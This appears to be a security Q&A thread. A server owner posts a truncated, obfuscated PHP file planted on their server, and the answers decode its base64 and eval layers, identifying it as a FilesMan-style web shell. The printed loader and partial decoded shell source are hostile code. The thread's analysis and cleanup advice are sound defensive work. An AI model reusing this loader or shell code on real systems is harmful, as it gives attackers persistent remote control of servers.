12

Can anyone help me to understand what this does? Someone has planted a file with this piece of code on my server.It is shortened because it cannot fit the question, but just to have some idea what could it be.

<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); 
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
$O0O000O0O=$O0O000O00.$OOO000000{11};
$O0O000O00=$O0O000O00.$OOO000000{3};
$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
$_F=__FILE__;
$_X='Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEwNmENCiAqLw0KQGQ1ZjRuNSgnVkVSU0lPTicsJzYuMCcpOw0KQDVycjJyX3I1cDJydDRuZyhFX0FMTCBeIEVfTk9USUNFKTsNCkBzNXNzNDJuX3N0MXJ0KCk7DQpANG40X3M1dCgnNXJyMnJfbDJnJyxOVUxMKTsNCkA0bjRfczV0KCdsMmdfNXJyMnJzJywwKTsNCkA0bjRfczV0KCdtMXhfNXg1YzN0NDJuX3Q0bTUnLDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0KQHM1dF9tMWc0Y19xMzJ0NXNfcjNudDRtNSgwKTsNCg0KNGYoZzV0X20xZzRjX3EzMnQ1c19ncGMoKSkgew0KCWYzbmN0NDJuIG0xZHN0cjRwc2wxc2g1cygkMXJyMXkpIHsNCgkJcjV0M3JuIDRzXzFycjF5KCQxcnIxeSkgPyAxcnIxeV9tMXAoJ20xZHN0cjRwc2wxc2g1cycsICQxcnIxeSkgOiBzdHI0cHNsMXNoNXMoJDFycjF5KTsNCgl9DQoJJF9QT1NUID0gbTFkc3RyNHBzbDFzaDVzKCRfUE9TVCk7DQp9DQokZDVmMTNsdF8xY3Q0Mm4gPSAnRjRsNXNNMW4nOw0KJGQ1ZjEzbHRfM3M1XzFqMXggPSB0cjM1Ow0KJGQ1ZjEzbHRfY2gxcnM1dCA9ICdXNG5kMndzLTZhaTYnOw0KNGYgKHN0cnQybDJ3NXIoczNic3RyKFBIUF9PUywwLG8pKT09Inc0biIpDQogICAgJHN5cz0ndzRuJzsNCiA1bHM1DQogICAgJHN5cz0nM240eCc7DQogICAgDQokaDJtNV9jd2QgPSBAZzV0Y3dkKCk7DQo0Zig0c3M1dCgkX1BPU1RbJ2MnXSkpDQoJQGNoZDRyKCRfUE9TVFsnYyddKTsgICANCiAgICANCiRjd2QgPSBAZzV0Y3dkKCk7DQo0Zigkc3lzID09ICd3NG4nKSANCnsNCiAgICAkaDJtNV9jd2QgPSBzdHJfcjVwbDFjNSgiXFwiLCAiLyIsICRoMm01X2N3ZCk7DQoJJGN3ZCA9IHN0cl9yNXBsMWM1KCJcXCIsICIvIiwgJG......TVFsnMSddID0gJ0Y0bDVzTTFuJzsNCjRmKCAhNW1wdHkoJF9QT1NUWycxJ10pICYmIGYzbmN0NDJuXzV4NHN0cygnbTFkJyAuICRfUE9TVFsnMSddKSApDQoJYzFsbF8zczVyX2YzbmMoJ20xZCcgLiAkX1BPU1RbJzEnXSk7DQoJNXg0dDsNCj8+';
eval($OOO0000O0('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
?>
unor
  • 1,769
  • 1
  • 19
  • 38
user72138
  • 121
  • 1
  • 3
  • 1
    Besides truncating _X did you leave anything else off? Looks like there are obfuscated "fopen","fread", functions in addition to the "base64_decode" etc... I'm not seeing where those are used... – hft Apr 09 '15 at 22:43

3 Answers3

14

You can decode the start of $_X:

root@bt:~# echo -e 'Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEwNmENCiAqLw0KQGQ1ZjRuNSgnVkVSU0lPTicsJzYuMCcpOw0KQDVycjJyX3I1cDJydDRuZyhFX0FMTCBeIEVfTk9USUNFKTsNCkBzNXNzNDJuX3N0MXJ0KCk7DQpANG40X3M1dCgnNXJyMnJfbDJnJyxOVUxMKTsNCkA0bjRfczV0KCdsMmdfNXJyMnJzJywwKTsNCkA0bjRfczV0KCdtMXhfNXg1YzN0NDJuX3Q0bTUnLDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0KQHM1dF9tMWc0Y19xMzJ0NXNfcjNudDRtNSgwKTsNCg0KNGYoZzV0X20xZzRjX3EzMnQ1c19ncGMoKSkgew0KCWYzbmN0NDJuIG0xZHN0cjRwc2wxc2g1cygkMXJyMXkpIHsNCgkJcjV0M3JuIDRzXzFycjF5KCQxcnIxeSkgPyAxcnIxeV9tMXAoJ20xZHN0cjRwc2wxc2g1cycsICQxcnIxeSkgOiBzdHI0cHNsMXNoNXMoJDFycjF5KTsNCgl9DQoJJF9QT1NUID0gbTFkc3RyNHBzbDFzaDVzKCRfUE9TVCk7DQp9DQokZDVmMTNsdF8xY3Q0Mm4gPSAnRjRsNXNNMW4nOw0KJGQ1ZjEzbHRfM3M1XzFqMXggPSB0cjM1Ow0KJGQ1ZjEzbHRfY2gxcnM1dCA9ICdXNG5kMndzLTZhaTYnOw0KNGYgKHN0cnQybDJ3NXIoczNic3RyKFBIUF9PUywwLG8pKT09Inc0biIpDQogICAgJHN5cz0ndzRuJzsNCiA1bHM1DQogICAgJHN5cz0nM240eCc7DQogICAgDQokaDJtNV9jd2QgPSBAZzV0Y3dkKCk7DQo0Zig0c3M1dCgkX1BPU1RbJ2MnXSkpDQoJQGNoZDRyKCRfUE9TVFsnYyddKTsgICANCiAgICANCiRjd2QgPSBAZzV0Y3dkKCk7DQo0Zigkc3lzID09ICd3NG4nKSANCnsNCiAgICAkaDJtNV9jd2QgPSBzdHJfcjVwbDFjNSgiXFwiLCAiLyIsICRoMm01X2N3ZCk7DQoJJGN3ZCA9IHN0cl9yNXBsMWM1KCJcXCIsICIvIiwgJG' | base64 -d -

?><?php

/**
 * @13th2r Ikr1m ALI
 * @c2pyr4ght a06a
 */
@d5f4n5('VERSION','6.0');
@5rr2r_r5p2rt4ng(E_ALL ^ E_NOTICE);
@s5ss42n_st1rt();
@4n4_s5t('5rr2r_l2g',NULL);
@4n4_s5t('l2g_5rr2rs',0);
@4n4_s5t('m1x_5x5c3t42n_t4m5',0);
@s5t_t4m5_l4m4t(0);
@s5t_m1g4c_q32t5s_r3nt4m5(0);

4f(g5t_m1g4c_q32t5s_gpc()) {
    f3nct42n m1dstr4psl1sh5s($1rr1y) {
        r5t3rn 4s_1rr1y($1rr1y) ? 1rr1y_m1p('m1dstr4psl1sh5s', $1rr1y) : str4psl1sh5s($1rr1y);
    }
    $_POST = m1dstr4psl1sh5s($_POST);
}
$d5f13lt_1ct42n = 'F4l5sM1n';
$d5f13lt_3s5_1j1x = tr35;
$d5f13lt_ch1rs5t = 'W4nd2ws-6ai6';
4f (strt2l2w5r(s3bstr(PHP_OS,0,o))=="w4n")
    $sys='w4n';
 5ls5
    $sys='3n4x';

$h2m5_cwd = @g5tcwd();
4f(4ss5t($_POST['c']))
    @chd4r($_POST['c']);   

$cwd = @g5tcwd();
4f($sys == 'w4n') 
{
    $h2m5_cwd = str_r5pl1c5("\\", "/", $h2m5_cwd);
    $cwd = str_r5pl1c5("\\", "/", $base64: invalid input

A quick google search reveals that it's a web shell and it has been decoded before: https://gist.github.com/smiler/4500976

In the eval line:

JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==

This is base64 decoded to:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
RoraΖ
  • 12,317
  • 4
  • 51
  • 83
wireghoul
  • 5,745
  • 2
  • 17
  • 26
4

Once you format the code a little, like how I edited your question, it's easier to see what's going on.

$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64' translates to $OOO000000=fg6sbehpra4co_tnd

All of that is used to build the string:

$OOO0000O0=base64_decode

The eval section is base64 encoded and resolves to:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

As you can see, the $_X is also base64 encoded, but I can't decode it because you truncated it.

Translating it all, and removing the obfuscation, it becomes:

$_F=__FILE__;
$_X='<truncated>'
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

Without knowing what is in $_X, we cannot know what the ultimate goal is. The big question is if this PHP file was run after it was uploaded.

schroeder
  • 123,438
  • 55
  • 284
  • 319
2

I decoded the whole code by changing the eval function to var_dump. This gave me: string(133) "$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;" or formatted:

$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;

I replaced the eval function in the file with this code. This code contains eval again. I replaced it again with var_dump and got the full decoded file:

<?php
/**
 * @author Ikram ALI
 * @copyright 2012
 */
@define('VERSION','1.0');
@error_reporting(E_ALL ^ E_NOTICE);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()) {
        function madstripslashes($array) {
                return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
        }
        $_POST = madstripslashes($_POST);
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
    $sys='win';
 else
    $sys='unix';

$home_cwd = @getcwd();
if(isset($_POST['c']))
        @chdir($_POST['c']);

$cwd = @getcwd();
if($sys == 'win')
{
    $home_cwd = str_replace("\\", "/", $home_cwd);

As you can see, the bottom part is missing. I assume that this is because you've only provided half of the script. Since the author of the script is provided I could find the whole code via Google here.

It is a shell. With this is a script, an attacker can view (and sometimes edit) files with, execute commands, view server data, ect... I've even seen some scary functions like maddos(), madsql(), madPerms() in the shell uploaded to your server.

I advise to remove this script and make sure nobody can get access to your FTP server anymore.

Tom
  • 67
  • 5